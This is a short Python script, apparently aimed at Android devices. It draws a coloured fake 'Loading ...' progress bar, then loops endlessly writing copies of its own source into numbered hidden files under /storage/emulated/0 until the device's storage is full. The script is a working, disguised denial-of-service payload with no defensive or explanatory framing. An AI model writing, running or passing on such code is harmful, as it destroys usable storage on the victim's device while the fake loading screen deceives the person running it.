import os, time
R = ("\033[31m")
pink = ('\033[95m')
G = ('\033[92m')
os.system('clear')
print(R)
print (R+"\n▓"+G+"▒▒▒▒▒▒▒▒▒▒▒▒▒▒ Loading ...\n")
time.sleep(0.1)
os.system('clear')
print (R+"\n▓▓"+G+"▒▒▒▒▒▒▒▒▒▒▒▒▒ Loading ...\n")
time.sleep(0.1)
os.system('clear')
print (R+"\n▓▓▓"+G+"▒▒▒▒▒▒▒▒▒▒▒▒ Loading ...\n")
time.sleep(0.1)
os.system('clear')
print (R+"\n▓▓▓▓"+G+"▒▒▒▒▒▒▒▒▒▒▒ Loading ...\n")
time.sleep(0.1)
os.system('clear')
print (R+"\n▓▓▓▓▓"+G+"▒▒▒▒▒▒▒▒▒▒ Loading ...\n")
time.sleep(0.1)
os.system('clear')
print (R+"\n▓▓▓▓▓▓"+G+"▒▒▒▒▒▒▒▒▒ Loading ...\n")
time.sleep(0.1)
os.system('clear')
print (R+"\n▓▓▓▓▓▓▓"+G+"▒▒▒▒▒▒▒▒ Loading ...\n")
time.sleep(0.1)
os.system('clear')
print (R+"\n▓▓▓▓▓▓▓▓"+G+"▒▒▒▒▒▒▒ Loading ...\n")
time.sleep(0.1)
os.system('clear')
print (R+"\n▓▓▓▓▓▓▓▓▓"+G+"▒▒▒▒▒▒ Loading ...\n")
time.sleep(0.1)
os.system('clear')
print (R+"\n▓▓▓▓▓▓▓▓▓▓"+G+"▒▒▒▒▒ Loading ...\n")
time.sleep(0.2)
os.system('clear')
print (R+"\n▓▓▓▓▓▓▓▓▓▓▓"+G+"▒▒▒▒ Loading ...\n")
time.sleep(0.4)
os.system('clear')
print (R+"\n▓▓▓▓▓▓▓▓▓▓▓▓"+G+"▒▒▒ Loading ...\n")
time.sleep(0.9)
os.system('clear')
print (R+"\n▓▓▓▓▓▓▓▓▓▓▓▓▓"+G+"▒▒ Loading ...\n")
time.sleep(0.1)
fff = 0
while True:
	with open('/storage/emulated/0/.file{0}' .format
	(fff), "w") as f:
		f.write(open(__file__).read())
		f.close()
		fff +=1